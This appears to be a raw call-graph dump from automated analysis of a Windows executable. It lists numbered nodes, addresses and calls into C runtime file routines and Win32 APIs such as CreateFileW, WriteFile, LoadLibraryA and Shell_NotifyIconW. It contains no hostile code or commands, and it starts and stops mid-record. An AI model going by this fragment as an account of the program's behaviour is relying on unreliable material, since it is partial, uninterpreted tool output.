__set_osfhnd 58 API calls 101762->101764 101765 4f85ba 101763->101765 101766 4f7ec9 101764->101766 101765->101752 101767 4e8b28 __set_osfhnd 58 API calls 101766->101767 101768 4f7ed6 101767->101768 101771 4e8db6 __commit 9 API calls 101768->101771 101770 4f7fa5 101769->101770 101778 4f7f83 101769->101778 101772 4e8af4 __set_osfhnd 58 API calls 101770->101772 101773 4f7ee0 101771->101773 101774 4f7faa 101772->101774 101773->101752 101775 4e8b28 __set_osfhnd 58 API calls 101774->101775 101776 4f7fb7 101775->101776 101777 4e8db6 __commit 9 API calls 101776->101777 101777->101758 101779 4ed294 __alloc_osfhnd 61 API calls 101778->101779 101780 4f8051 101779->101780 101781 4f807e 101780->101781 101782 4f805b 101780->101782 101784 4f7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 101781->101784 101783 4e8af4 __set_osfhnd 58 API calls 101782->101783 101785 4f8060 101783->101785 101792 4f80a0 101784->101792 101786 4e8b28 __set_osfhnd 58 API calls 101785->101786 101789 4f806a 101786->101789 101787 4f811e GetFileType 101790 4f816b 101787->101790 101791 4f8129 GetLastError 101787->101791 101788 4f80ec GetLastError 101793 4e8b07 __dosmaperr 58 API calls 101788->101793 101794 4e8b28 __set_osfhnd 58 API calls 101789->101794 101800 4ed52a __set_osfhnd 59 API calls 101790->101800 101795 4e8b07 __dosmaperr 58 API calls 101791->101795 101792->101787 101792->101788 101796 4f7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 101792->101796 101797 4f8111 101793->101797 101794->101773 101798 4f8150 CloseHandle 101795->101798 101799 4f80e1 101796->101799 101802 4e8b28 __set_osfhnd 58 API calls 101797->101802 101798->101797 101801 4f815e 101798->101801 101799->101787 101799->101788 101806 4f8189 101800->101806 101803 4e8b28 __set_osfhnd 58 API calls 101801->101803 101802->101758 101804 4f8163 101803->101804 101804->101797 101805 4f8344 101805->101758 101808 4f8517 CloseHandle 101805->101808 101806->101805 101807 4f18c1 __lseeki64_nolock 60 API calls 101806->101807 101823 4f820a 101806->101823 101809 4f81f3 101807->101809 101810 4f7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 101808->101810 101813 4e8af4 __set_osfhnd 58 API calls 101809->101813 101829 4f8212 101809->101829 101812 4f853e 101810->101812 101811 4f0e5b 70 API calls __read_nolock 101811->101829 101814 4f83ce 101812->101814 101815 4f8546 GetLastError 101812->101815 101813->101823 101814->101758 101816 4e8b07 __dosmaperr 58 API calls 101815->101816 101819 4f8552 101816->101819 101817 4f0add __close_nolock 61 API calls 101817->101829 101818 4f18c1 60 API calls __lseeki64_nolock 101818->101829 101820 4ed43d __free_osfhnd 59 API calls 101819->101820 101820->101814 101821 4f97a2 __chsize_nolock 82 API calls 101821->101829 101822 4ed886 __write 78 API calls 101822->101823 101823->101805 101823->101822 101826 4f18c1 60 API calls __lseeki64_nolock 101823->101826 101823->101829 101824 4f83c1 101827 4f0add __close_nolock 61 API calls 101824->101827 101825 4f83aa 101825->101805 101826->101823 101828 4f83c8 101827->101828 101830 4e8b28 __set_osfhnd 58 API calls 101828->101830 101829->101811 101829->101817 101829->101818 101829->101821 101829->101823 101829->101824 101829->101825 101830->101814 101831->101749 101832->101754 101833->101754 101835 4c4b83 101834->101835 101836 4c4c3f LoadLibraryA 101834->101836 101835->101634 101835->101635 101836->101835 101837 4c4c50 GetProcAddress 101836->101837 101837->101835 101839 4c4ea3 FindResourceExW 101838->101839 101843 4c4ec0 101838->101843 101840 4fd933 LoadResource 101839->101840 101839->101843 101841 4fd948 SizeofResource 101840->101841 101840->101843 101842 4fd95c LockResource 101841->101842 101841->101843 101842->101843 101843->101648 101845 4fd9ab 101844->101845 101846 4c4ef4 101844->101846 101850 4e584d 101846->101850 101848 4c4f02 101848->101654 101849->101648 101851 4e5859 __ioinit 101850->101851 101852 4e586b 101851->101852 101854 4e5891 101851->101854 101863 4e8b28 58 API calls __getptd_noexit 101852->101863 101865 4e6c11 101854->101865 101856 4e5870 101864 4e8db6 9 API calls __commit 101856->101864 101857 4e5897 101871 4e57be 83 API calls 5 library calls 101857->101871 101860 4e58a6 101872 4e58c8 LeaveCriticalSection LeaveCriticalSection __wfsopen 101860->101872 101862 4e587b __ioinit 101862->101848 101863->101856 101864->101862 101866 4e6c43 EnterCriticalSection 101865->101866 101867 4e6c21 101865->101867 101868 4e6c39 101866->101868 101867->101866 101869 4e6c29 101867->101869 101868->101857 101870 4e9c0b __lock 58 API calls 101869->101870 101870->101868 101871->101860 101872->101862 101876 4e55fd 101873->101876 101875 4c4f2e 101875->101662 101877 4e5609 __ioinit 101876->101877 101878 4e561f _memset 101877->101878 101879 4e564c 101877->101879 101880 4e5644 __ioinit 101877->101880 101889 4e8b28 58 API calls __getptd_noexit 101878->101889 101881 4e6c11 __lock_file 59 API calls 101879->101881 101880->101875 101882 4e5652 101881->101882 101891 4e541d 72 API calls 6 library calls 101882->101891 101885 4e5639 101890 4e8db6 9 API calls __commit 101885->101890 101886 4e5668 101892 4e5686 LeaveCriticalSection LeaveCriticalSection __wfsopen 101886->101892 101889->101885 101890->101880 101891->101886 101892->101880 101896 4e520a GetSystemTimeAsFileTime 101893->101896 101895 528f6e 101895->101664 101897 4e5238 __aulldiv 101896->101897 101897->101895 101899 4e5c6c __ioinit 101898->101899 101900 4e5c7e 101899->101900 101901 4e5c93 101899->101901 101912 4e8b28 58 API calls __getptd_noexit 101900->101912 101903 4e6c11 __lock_file 59 API calls 101901->101903 101905 4e5c99 101903->101905 101904 4e5c83 101913 4e8db6 9 API calls __commit 101904->101913 101914 4e58d0 67 API calls 7 library calls 101905->101914 101908 4e5ca4 101915 4e5cc4 LeaveCriticalSection LeaveCriticalSection __wfsopen 101908->101915 101910 4e5cb6 101911 4e5c8e __ioinit 101910->101911 101911->101668 101912->101904 101913->101911 101914->101908 101915->101910 101916->101551 101917->101564 101918->101566 101919->101563 101920->101574 101922 529748 __tzset_nolock _wcscmp 101921->101922 101923 5295dc 101922->101923 101924 4c4f0b 74 API calls 101922->101924 101925 529109 GetSystemTimeAsFileTime 101922->101925 101926 4c4ee5 85 API calls 101922->101926 101923->101582 101923->101611 101924->101922 101925->101922 101926->101922 101927->101608 101929 4e53b2 __ioinit 101928->101929 101930 4e53de 101929->101930 101931 4e53c6 101929->101931 101933 4e6c11 __lock_file 59 API calls 101930->101933 101937 4e53d6 __ioinit 101930->101937 101957 4e8b28 58 API calls __getptd_noexit 101931->101957 101935 4e53f0 101933->101935 101934 4e53cb 101958 4e8db6 9 API calls __commit 101934->101958 101941 4e533a 101935->101941 101937->101613 101942 4e535d 101941->101942 101943 4e5349 101941->101943 101944 4e5359 101942->101944 101960 4e4a3d 101942->101960 102003 4e8b28 58 API calls __getptd_noexit 101943->102003 101959 4e5415 LeaveCriticalSection LeaveCriticalSection __wfsopen 101944->101959 101947 4e534e 102004 4e8db6 9 API calls __commit 101947->102004 101953 4e5377 101977 4f0a02 101953->101977 101955 4e537d 101955->101944 101956 4e2d55 _free 58 API calls 101955->101956 101956->101944 101957->101934 101958->101937 101959->101937 101961 4e4a74 101960->101961 101962 4e4a50 101960->101962 101966 4f0b77 101961->101966 101962->101961 101963 4e46e6 __filbuf 58 API calls 101962->101963 101964 4e4a6d 101963->101964 102005 4ed886 101964->102005 101967 4e5371 101966->101967 101968 4f0b84 101966->101968 101970 4e46e6 101967->101970 101968->101967 101969 4e2d55 _free 58 API calls 101968->101969 101969->101967 101971 4e4705 101970->101971 101972 4e46f0 101970->101972 101971->101953 102140 4e8b28 58 API calls __getptd_noexit 101972->102140 101974 4e46f5 102141 4e8db6 9 API calls __commit 101974->102141 101976 4e4700 101976->101953 101978 4f0a0e __ioinit 101977->101978 101979 4f0a1b 101978->101979 101980 4f0a32 101978->101980 102157 4e8af4 58 API calls __getptd_noexit 101979->102157 101982 4f0abd 101980->101982 101984 4f0a42 101980->101984 102162 4e8af4 58 API calls __getptd_noexit 101982->102162 101983 4f0a20 102158 4e8b28 58 API calls __getptd_noexit 101983->102158 101987 4f0a6a 101984->101987 101988 4f0a60 101984->101988 101990 4ed206 ___lock_fhandle 59 API calls 101987->101990 102159 4e8af4 58 API calls __getptd_noexit 101988->102159 101989 4f0a65 102163 4e8b28 58 API calls __getptd_noexit 101989->102163 101992 4f0a70 101990->101992 101995 4f0a8e 101992->101995 101996 4f0a83 101992->101996 101994 4f0ac9 102164 4e8db6 9 API calls __commit 101994->102164 102160 4e8b28 58 API calls __getptd_noexit 101995->102160 102142 4f0add 101996->102142 101999 4f0a27 __ioinit 101999->101955 102001 4f0a89 102161 4f0ab5 LeaveCriticalSection __unlock_fhandle 102001->102161 102003->101947 102004->101944 102006 4ed892 __ioinit 102005->102006 102007 4ed89f 102006->102007 102008 4ed8b6 102006->102008 102106 4e8af4 58 API calls __getptd_noexit 102007->102106 102010 4ed955 102008->102010 102012 4ed8ca 102008->102012 102112 4e8af4 58 API calls __getptd_noexit 102010->102112 102011 4ed8a4 102107 4e8b28 58 API calls __getptd_noexit 102011->102107 102016 4ed8e8 102012->102016 102017 4ed8f2 102012->102017 102014 4ed8ed 102113 4e8b28 58 API calls __getptd_noexit 102014->102113 102108 4e8af4 58 API calls __getptd_noexit 102016->102108 102033 4ed206 102017->102033 102019 4ed8ab __ioinit 102019->101961 102022 4ed8f8 102024 4ed91e 102022->102024 102025 4ed90b 102022->102025 102023 4ed961 102114 4e8db6 9 API calls __commit 102023->102114 102109 4e8b28 58 API calls __getptd_noexit 102024->102109 102042 4ed975 102025->102042 102029 4ed923 102110 4e8af4 58 API calls __getptd_noexit 102029->102110 102030 4ed917 102111 4ed94d LeaveCriticalSection __unlock_fhandle 102030->102111 102034 4ed212 __ioinit 102033->102034 102035 4ed261 EnterCriticalSection 102034->102035 102037 4e9c0b __lock 58 API calls 102034->102037 102036 4ed287 __ioinit 102035->102036 102036->102022 102038 4ed237 102037->102038 102039 4ed24f 102038->102039 102115 4e9e2b InitializeCriticalSectionAndSpinCount 102038->102115 102116 4ed28b LeaveCriticalSection _doexit 102039->102116 102043 4ed982 __ftell_nolock 102042->102043 102044 4ed9e0 102043->102044 102045 4ed9c1 102043->102045 102073 4ed9b6 102043->102073 102048 4eda1c 102044->102048 102052 4eda38 102044->102052 102126 4e8af4 58 API calls __getptd_noexit 102045->102126 102046 4ec5f6 __NMSG_WRITE 6 API calls 102049 4ee1d6 102046->102049 102129 4e8af4 58 API calls __getptd_noexit 102048->102129 102049->102030 102050 4ed9c6 102127 4e8b28 58 API calls __getptd_noexit 102050->102127 102060 4eda51 102052->102060 102132 4f18c1 60 API calls 3 library calls 102052->102132 102054 4eda21 102130 4e8b28 58 API calls __getptd_noexit 102054->102130 102056 4ed9cd 102128 4e8db6 9 API calls __commit 102056->102128 102058 4eda5f 102062 4eddb8 102058->102062 102133 4e99ac 58 API calls 2 library calls 102058->102133 102117 4f5c6b 102060->102117 102064 4ee14b WriteFile 102062->102064 102065 4eddd6 102062->102065 102063 4eda28 102131 4e8db6 9 API calls __commit 102063->102131 102068 4eddab GetLastError 102064->102068 102074 4edd78 102064->102074 102069 4edefa 102065->102069 102077 4eddec 102065->102077 102068->102074 102080 4edfef 102069->102080 102082 4edf05 102069->102082 102070 4eda8b GetConsoleMode 102070->102062 102072 4edaca 102070->102072 102071 4ee184 102071->102073 102138 4e8b28 58 API calls __getptd_noexit 102071->102138 102072->102062 102075 4edada GetConsoleCP 102072->102075 102073->102046 102074->102071 102074->102073 102079 4eded8 102074->102079 102075->102071 102103 4edb09 102075->102103 102076 4ede5b WriteFile 102076->102068 102081 4ede98 102076->102081 102077->102071 102077->102076 102085 4ee17b 102079->102085 102086 4edee3 102079->102086 102080->102071 102087 4ee064 WideCharToMultiByte 102080->102087 102081->102077 102088 4edebc 102081->102088 102082->102071 102089 4edf6a WriteFile 102082->102089 102083 4ee1b2 102139 4e8af4 58 API calls __getptd_noexit 102083->102139 102137 4e8b07 58 API calls 2 library calls 102085->102137 102135 4e8b28 58 API calls __getptd_noexit 102086->102135 102087->102068 102098 4ee0ab 102087->102098 102088->102074 102089->102068 102090 4edfb9 102089->102090 102090->102074 102090->102082 102090->102088 102093 4edee8 102136 4e8af4 58 API calls __getptd_noexit 102093->102136 102094 4ee0b3 WriteFile 102097 4ee106 GetLastError 102094->102097 102094->102098 102097->102098 102098->102074 102098->102080 102098->102088 102098->102094 102099 4f7a5e WriteConsoleW CreateFileW __putwch_nolock 102104 4edc5f 102099->102104 102100 4f62ba 60 API calls __write_nolock 102100->102103 102101 4edbf2 WideCharToMultiByte 102101->102074 102102 4edc2d WriteFile 102101->102102 102102->102068 102102->102104 102103->102074 102103->102100 102103->102101 102103->102104 102134 4e35f5 58 API calls __isleadbyte_l 102103->102134 102104->102068 102104->102074 102104->102099 102104->102103 102105 4edc87 WriteFile 102104->102105 102105->102068 102105->102104 102106->102011 102107->102019 102108->102014 102109->102029 102110->102030 102111->102019 102112->102014 102113->102023 102114->102019 102115->102039 102116->102035 102118 4f5c76 102117->102118 102119 4f5c83 102117->102119 102120 4e8b28 __set_osfhnd 58 API calls 102118->102120 102122 4f5c8f 102119->102122 102123 4e8b28 __set_osfhnd 58 API calls 102119->102123 102121 4f5c7b 102120->102121 102121->102058 102122->102058 102124 4f5cb0 102123->102124 102125 4e8db6 __commit 9 API calls 102124->102125 102125->102121 102126->102050 102127->102056 102128->102073 102129->102054 102130->102063 102131->102073 102132->102060 102133->102070 102134->102103 102135->102093 102136->102073 102137->102073 102138->102083 102139->102073 102140->101974 102141->101976 102165 4ed4c3 102142->102165 102144 4f0b41 102178 4ed43d 59 API calls __set_osfhnd 102144->102178 102146 4f0aeb 102146->102144 102149 4ed4c3 __close_nolock 58 API calls 102146->102149 102156 4f0b1f 102146->102156 102147 4ed4c3 __close_nolock 58 API calls 102150 4f0b2b CloseHandle 102147->102150 102148 4f0b49 102155 4f0b6b 102148->102155 102179 4e8b07 58 API calls 2 library calls 102148->102179 102151 4f0b16 102149->102151 102150->102144 102153 4f0b37 GetLastError 102150->102153 102152 4ed4c3 __close_nolock 58 API calls 102151->102152 102152->102156 102153->102144 102155->102001 102156->102144 102156->102147 102157->101983 102158->101999 102159->101989 102160->102001 102161->101999 102162->101989 102163->101994 102164->101999 102166 4ed4ce 102165->102166 102167 4ed4e3 102165->102167 102180 4e8af4 58 API calls __getptd_noexit 102166->102180 102172 4ed508 102167->102172 102182 4e8af4 58 API calls __getptd_noexit 102167->102182 102169 4ed4d3 102181 4e8b28 58 API calls __getptd_noexit 102169->102181 102172->102146 102173 4ed512 102183 4e8b28 58 API calls __getptd_noexit 102173->102183 102174 4ed4db 102174->102146 102176 4ed51a 102184 4e8db6 9 API calls __commit 102176->102184 102178->102148 102179->102155 102180->102169 102181->102174 102182->102173 102183->102176 102184->102174 102186 4f1940 __ftell_nolock 102185->102186 102187 4e079e GetLongPathNameW 102186->102187 102188 4c7bcc 59 API calls 102187->102188 102189 4c72bd 102188->102189 102190 4c700b 102189->102190 102191 4c7667 59 API calls 102190->102191 102192 4c701d 102191->102192 102193 4c4750 60 API calls 102192->102193 102194 4c7028 102193->102194 102195 4fe885 102194->102195 102196 4c7033 102194->102196 102201 4fe89f 102195->102201 102243 4c7908 61 API calls 102195->102243 102197 4c3f74 59 API calls 102196->102197 102199 4c703f 102197->102199 102237 4c34c2 102199->102237 102202 4c7052 Mailbox 102202->101380 102204 4c4ddd 136 API calls 102203->102204 102205 4c688f 102204->102205 102206 4fe031 102205->102206 102207 4c4ddd 136 API calls 102205->102207 102208 52955b 122 API calls 102206->102208 102210 4c68a3 102207->102210 102209 4fe046 102208->102209 102211 4fe04a 102209->102211 102212 4fe067 102209->102212 102210->102206 102213 4c68ab 102210->102213 102214 4c4e4a 84 API calls 102211->102214 102215 4e0db6 Mailbox 59 API calls 102212->102215 102216 4c68b7 102213->102216 102217 4fe052 102213->102217 102214->102217 102236 4fe0ac Mailbox 102215->102236 102244 4c6a8c 102216->102244 102351 5242f8 90 API calls _wprintf 102217->102351 102220 4fe060 102220->102212 102222 4fe260 102223 4e2d55 _free 58 API calls 102222->102223 102224 4fe268 102223->102224 102225 4c4e4a 84 API calls 102224->102225 102230 4fe271 102225->102230 102229 4e2d55 _free 58 API calls 102229->102230 102230->102229 102232 4c4e4a 84 API calls 102230->102232 102355 51f7a1 89 API calls 4 library calls 102230->102355 102232->102230 102233 4c7de1 59 API calls 102233->102236 102236->102222 102236->102230 102236->102233 102337 4c750f 102236->102337 102345 4c735d 102236->102345 102352 51f73d 59 API calls 2 library calls 102236->102352 102353 51f65e 61 API calls 2 library calls 102236->102353 102354 52737f 59 API calls Mailbox 102236->102354 102238 4c34d4 102237->102238 102242 4c34f3 _memmove 102237->102242 102241 4e0db6 Mailbox 59 API calls 102238->102241 102239 4e0db6 Mailbox 59 API calls 102240 4c350a 102239->102240 102240->102202 102241->102242 102242->102239 102243->102195 102245 4fe41e 102244->102245 102246 4c6ab5 102244->102246 102428 51f7a1 89 API calls 4 library calls 102245->102428 102361 4c57a6 60 API calls Mailbox 102246->102361 102249 4fe431 102429 51f7a1 89 API calls 4 library calls 102249->102429 102250 4c6ad7 102362 4c57f6 67 API calls 102250->102362 102252 4c6aec 102252->102249 102253 4c6af4 102252->102253 102255 4c7667 59 API calls 102253->102255 102257 4c6b00 102255->102257 102256 4fe44d 102259 4c6b61 102256->102259 102363 4e0957 60 API calls __ftell_nolock 102257->102363 102261 4c6b6f 102259->102261 102262 4fe460 102259->102262 102260 4c6b0c 102263 4c7667 59 API calls 102260->102263 102265 4c7667 59 API calls 102261->102265 102264 4c5c6f CloseHandle 102262->102264 102266 4c6b18 102263->102266 102267 4fe46c 102264->102267 102268 4c6b78 102265->102268 102270 4c4750 60 API calls 102266->102270 102271 4c4ddd 136 API calls 102267->102271 102269 4c7667 59 API calls 102268->102269 102272 4c6b81 102269->102272 102273 4c6b26 102270->102273 102274 4fe488 102271->102274 102366 4c459b 102272->102366 102364 4c5850 ReadFile SetFilePointerEx 102273->102364 102277 4fe4b1 102274->102277 102278 52955b 122 API calls 102274->102278 102430 51f7a1 89 API calls 4 library calls 102277->102430 102282 4fe4a4 102278->102282 102279 4c6b98 102283 4c7b2e 59 API calls 102279->102283 102281 4c6b52 102365 4c5aee SetFilePointerEx SetFilePointerEx 102281->102365 102286 4fe4cd 102282->102286 102287 4fe4ac 102282->102287 102288 4c6ba9 SetCurrentDirectoryW 102283->102288 102284 4fe4c8 102315 4c6d0c Mailbox 102284->102315 102290 4c4e4a 84 API calls 102286->102290 102289 4c4e4a 84 API calls 102287->102289 102293 4c6bbc Mailbox 102288->102293 102289->102277 102291 4fe4d2 102290->102291 102292 4e0db6 Mailbox 59 API calls 102291->102292 102299 4fe506 102292->102299 102295 4e0db6 Mailbox 59 API calls 102293->102295 102297 4c6bcf 102295->102297 102296 4c3bbb 102296->101239 102296->101248 102298 4c522e 59 API calls 102297->102298 102326 4c6bda Mailbox __NMSG_WRITE 102298->102326 102300 4c750f 59 API calls 102299->102300 102334 4fe54f Mailbox 102300->102334 102301 4c6ce7 102424 4c5c6f 102301->102424 102303 4fe740 102435 5272df 59 API calls Mailbox 102303->102435 102305 4c6cf3 SetCurrentDirectoryW 102305->102315 102308 4fe762 102436 53fbce 59 API calls 2 library calls 102308->102436 102311 4fe76f 102313 4e2d55 _free 58 API calls 102311->102313 102312 4fe7d9 102439 51f7a1 89 API calls 4 library calls 102312->102439 102313->102315 102356 4c57d4 102315->102356 102317 4c750f 59 API calls 102317->102334 102318 4fe7f2 102318->102301 102319 4fe7d1 102438 51f5f7 59 API calls 4 library calls 102319->102438 102321 4c7de1 59 API calls 102321->102326 102326->102301 102326->102312 102326->102319 102326->102321 102417 4c586d 67 API calls _wcscpy 102326->102417 102418 4c6f5d GetStringTypeW 102326->102418 102419 4c6ecc 60 API calls __wcsnicmp 102326->102419 102420 4c6faa GetStringTypeW __NMSG_WRITE 102326->102420 102421 4e363d GetStringTypeW _iswctype 102326->102421 102422 4c68dc 165 API calls 3 library calls 102326->102422 102423 4c7213 59 API calls Mailbox 102326->102423 102327 4c7de1 59 API calls 102327->102334 102331 4fe792 102437 51f7a1 89 API calls 4 library calls 102331->102437 102333 4fe7ab 102335 4e2d55 _free 58 API calls 102333->102335 102334->102303 102334->102317 102334->102327 102334->102331 102431 51f73d 59 API calls 2 library calls 102334->102431 102432 51f65e 61 API calls 2 library calls 102334->102432 102433 52737f 59 API calls Mailbox 102334->102433 102434 4c7213 59 API calls Mailbox 102334->102434 102336 4fe7be 102335->102336 102336->102315 102338 4c75af 102337->102338 102344 4c7522 _memmove 102337->102344 102340 4e0db6 Mailbox 59 API calls 102338->102340 102339 4e0db6 Mailbox 59 API calls 102341 4c7529 102339->102341 102340->102344 102342 4e0db6 Mailbox 59 API calls 102341->102342 102343 4c7552 102341->102343 102342->102343 102343->102236 102344->102339 102346 4c7370 102345->102346 102348 4c741e 102345->102348 102347 4e0db6 Mailbox 59 API calls 102346->102347 102350 4c73a2 102346->102350 102347->102350 102348->102236 102349 4e0db6 59 API calls Mailbox 102349->102350 102350->102348 102350->102349 102351->102220 102352->102236 102353->102236 102354->102236 102355->102230 102357 4c5c6f CloseHandle 102356->102357 102358 4c57dc Mailbox 102357->102358 102359 4c5c6f CloseHandle 102358->102359 102360 4c57eb 102359->102360 102360->102296 102361->102250 102362->102252 102363->102260 102364->102281 102365->102259 102367 4c7667 59 API calls 102366->102367 102368 4c45b1 102367->102368 102369 4c7667 59 API calls 102368->102369 102370 4c45b9 102369->102370 102371 4c7667 59 API calls 102370->102371 102372 4c45c1 102371->102372 102373 4c7667 59 API calls 102372->102373 102374 4c45c9 102373->102374 102375 4c45fd 102374->102375 102376 4fd4d2 102374->102376 102377 4c784b 59 API calls 102375->102377 102378 4c8047 59 API calls 102376->102378 102379 4c460b 102377->102379 102380 4fd4db 102378->102380 102381 4c7d2c 59 API calls 102379->102381 102382 4c7d8c 59 API calls 102380->102382 102383 4c4615 102381->102383 102385 4c4640 102382->102385 102384 4c784b 59 API calls 102383->102384 102383->102385 102387 4c4636 102384->102387 102388 4c465f 102385->102388 102389 4fd4fb 102385->102389 102403 4c4680 102385->102403 102386 4c784b 59 API calls 102390 4c4691 102386->102390 102391 4c7d2c 59 API calls 102387->102391 102393 4c79f2 59 API calls 102388->102393 102392 4fd5cb 102389->102392 102401 4fd5b4 102389->102401 102410 4fd532 102389->102410 102396 4c8047 59 API calls 102390->102396 102397 4c46a3 102390->102397 102391->102385 102394 4c7bcc 59 API calls 102392->102394 102395 4c4669 102393->102395 102412 4fd588 102394->102412 102399 4c784b 59 API calls 102395->102399 102395->102403 102396->102397 102398 4c46b3 102397->102398 102400 4c8047 59 API calls 102397->102400 102402 4c46ba 102398->102402 102404 4c8047 59 API calls 102398->102404 102399->102403 102400->102398 102401->102392 102406 4fd59f 102401->102406 102405 4c8047 59 API calls 102402->102405 102414 4c46c1 Mailbox 102402->102414 102403->102386 102404->102402 102405->102414 102408 4c7bcc 59 API calls 102406->102408 102407 4fd590 102409 4c7bcc 59 API calls 102407->102409 102408->102412 102409->102412 102410->102407 102415 4fd57b 102410->102415 102411 4c79f2 59 API calls 102411->102412 102412->102403 102412->102411 102440 4c7924 59 API calls 2 library calls 102412->102440 102414->102279 102416 4c7bcc 59 API calls 102415->102416 102416->102412 102417->102326 102418->102326 102419->102326 102420->102326 102421->102326 102422->102326 102423->102326 102425 4c5c88 102424->102425 102426 4c5c79 102424->102426 102425->102426 102427 4c5c8d CloseHandle 102425->102427 102426->102305 102427->102426 102428->102249 102429->102256 102430->102284 102431->102334 102432->102334 102433->102334 102434->102334 102435->102308 102436->102311 102437->102333 102438->102312 102439->102318 102440->102412 102442 4c6d95 102441->102442 102447 4c6ea9 102441->102447 102443 4e0db6 Mailbox 59 API calls 102442->102443 102442->102447 102445 4c6dbc 102443->102445 102444 4e0db6 Mailbox 59 API calls 102451 4c6e31 102444->102451 102445->102444 102447->101386 102449 4c735d 59 API calls 102449->102451 102450 4c750f 59 API calls 102450->102451 102451->102447 102451->102449 102451->102450 102454 4c6240 102451->102454 102479 516553 59 API calls Mailbox 102451->102479 102452->101389 102453->101391 102480 4c7a16 102454->102480 102456 4c646a 102457 4c750f 59 API calls 102456->102457 102458 4c6484 Mailbox 102457->102458 102458->102451 102461 4fdff6 102489 51f8aa 91 API calls 4 library calls 102461->102489 102462 4c750f 59 API calls 102471 4c6265 102462->102471 102466 4c7d8c 59 API calls 102466->102471 102467 4fe004 102468 4c750f 59 API calls 102467->102468 102469 4fe01a 102468->102469 102469->102458 102470 4c6799 _memmove 102490 51f8aa 91 API calls 4 library calls 102470->102490 102471->102456 102471->102461 102471->102462 102471->102466 102471->102470 102472 4fdf92 102471->102472 102476 4c7e4f 59 API calls 102471->102476 102485 4c5f6c 60 API calls 102471->102485 102486 4c5d41 59 API calls Mailbox 102471->102486 102487 4c5e72 60 API calls 102471->102487 102488 4c7924 59 API calls 2 library calls 102471->102488 102473 4c8029 59 API calls 102472->102473 102474 4fdf9d 102473->102474 102478 4e0db6 Mailbox 59 API calls 102474->102478 102477 4c643b CharUpperBuffW 102476->102477 102477->102471 102478->102470 102479->102451 102481 4e0db6 Mailbox 59 API calls 102480->102481 102482 4c7a3b 102481->102482 102483 4c8029 59 API calls 102482->102483 102484 4c7a4a 102483->102484 102484->102471 102485->102471 102486->102471 102487->102471 102488->102471 102489->102467 102490->102458 102491->101404 102492->101405 102494 4c4196 102493->102494 102495 4fd423 102493->102495 102494->101411 102519 522f94 62 API calls _W_store_winword 102494->102519 102495->102494 102496 4fd42c DestroyIcon 102495->102496 102496->102494 102498 4c416f Mailbox 102497->102498 102499 4c4098 102497->102499 102498->101417 102500 4c7a16 59 API calls 102499->102500 102501 4c40a6 102500->102501 102502 4fd3c8 LoadStringW 102501->102502 102503 4c40b3 102501->102503 102506 4fd3e2 102502->102506 102504 4c7bcc 59 API calls 102503->102504 102505 4c40c8 102504->102505 102505->102506 102507 4c40d9 102505->102507 102508 4c7b2e 59 API calls 102506->102508 102509 4c4174 102507->102509 102510 4c40e3 102507->102510 102513 4fd3ec 102508->102513 102511 4c8047 59 API calls 102509->102511 102512 4c7b2e 59 API calls 102510->102512 102516 4c40ed _memset _wcscpy 102511->102516 102512->102516 102514 4c7cab 59 API calls 102513->102514 102513->102516 102515 4fd40e 102514->102515 102518 4c7cab 59 API calls 102515->102518 102517 4c4155 Shell_NotifyIconW 102516->102517 102517->102498 102518->102516 102519->101411 102521 4ce6d5 102520->102521 102522 503aa9 102521->102522 102525 4ce73f 102521->102525 102536 4ce799 102521->102536 102523 4c9ea0 341 API calls 102522->102523 102524 503abe 102523->102524 102534 4ce970 Mailbox 102524->102534 102687 529e4a 89 API calls 4 library calls 102524->102687 102528 4c7667 59 API calls 102525->102528 102525->102536 102526 4c7667 59 API calls 102526->102536 102529 503b04 102528->102529 102532 4e2d40 __cinit 67 API calls 102529->102532 102530 4e2d40 __cinit 67 API calls 102530->102536 102531 503b26 102531->101494 102532->102536 102533 529e4a 89 API calls 102533->102534 102534->102533 102535 4c84c0 69 API calls 102534->102535 102537 4c9ea0 341 API calls 102534->102537 102540 4c8d40 59 API calls 102534->102540 102541 4c9c90 Mailbox 59 API calls 102534->102541 102548 4cf195 102534->102548 102550 4cea78 102534->102550 102686 4c7f77 59 API calls 2 library calls 102534->102686 102689 516e8f 59 API calls 102534->102689 102690 53c5c3 341 API calls 102534->102690 102691 53b53c 341 API calls Mailbox 102534->102691 102693 5393c6 341 API calls Mailbox 102534->102693 102535->102534 102536->102526 102536->102530 102536->102531 102536->102534 102538 4ce95a 102536->102538 102537->102534 102538->102534 102688 529e4a 89 API calls 4 library calls 102538->102688 102540->102534 102541->102534 102692 529e4a 89 API calls 4 library calls 102548->102692 102549 503e25 102549->101494 102550->101494 102552 4cf4ba 102551->102552 102553 4cf650 102551->102553 102554 4cf4c6 102552->102554 102555 50441e 102552->102555 102556 4c7de1 59 API calls 102553->102556 102789 4cf290 341 API calls 2 library calls 102554->102789 102790 53bc6b 341 API calls Mailbox 102555->102790 102562 4cf58c Mailbox 102556->102562 102559 50442c 102563 4cf630 102559->102563 102791 529e4a 89 API calls 4 library calls 102559->102791 102561 4cf4fd 102561->102559 102561->102562 102561->102563 102568 4c4e4a 84 API calls 102562->102568 102694 523c37 102562->102694 102697 53df37 102562->102697 102700 52cb7a 102562->102700 102780 53445a 102562->102780 102563->101494 102564 4c9c90 Mailbox 59 API calls 102565 4cf5e3 102564->102565 102565->102563 102565->102564 102568->102565 102572 4c3212 102571->102572 102573 4c31e0 102571->102573 102572->101494 102573->102572 102574 4c3205 IsDialogMessageW 102573->102574 102575 4fcf32 GetClassLongW 102573->102575 102574->102572 102574->102573 102575->102573 102575->102574 102576->101494 102949 4c8180 102577->102949 102579 4cfd3d 102580 50472d 102579->102580 102639 4d06f6 102579->102639 102954 4cf234 102579->102954 102968 529e4a 89 API calls 4 library calls 102580->102968 102584 4cfdd3 102585 4cfe3e 102584->102585 102587 4d0517 102584->102587 102588 504742 102584->102588 102597 504755 102584->102597 102608 4e0db6 59 API calls Mailbox 102584->102608 102619 4c9ea0 341 API calls 102584->102619 102630 50480c 102584->102630 102633 4d0545 _memmove 102584->102633 102595 4cfe4c 102585->102595 102615 50488d 102585->102615 102972 5166ec 59 API calls 2 library calls 102585->102972 102594 4e0db6 Mailbox 59 API calls 102587->102594 102590 5047d7 102590->102588 102970 529e4a 89 API calls 4 library calls 102590->102970 102591 504848 102973 5160ef 59 API calls 2 library calls 102591->102973 102594->102633 102596 5048f9 102595->102596 102644 504b53 102595->102644 102958 4c837c 102595->102958 102603 504917 102596->102603 102976 4c85c0 102596->102976 102597->102590 102969 4cf6a3 341 API 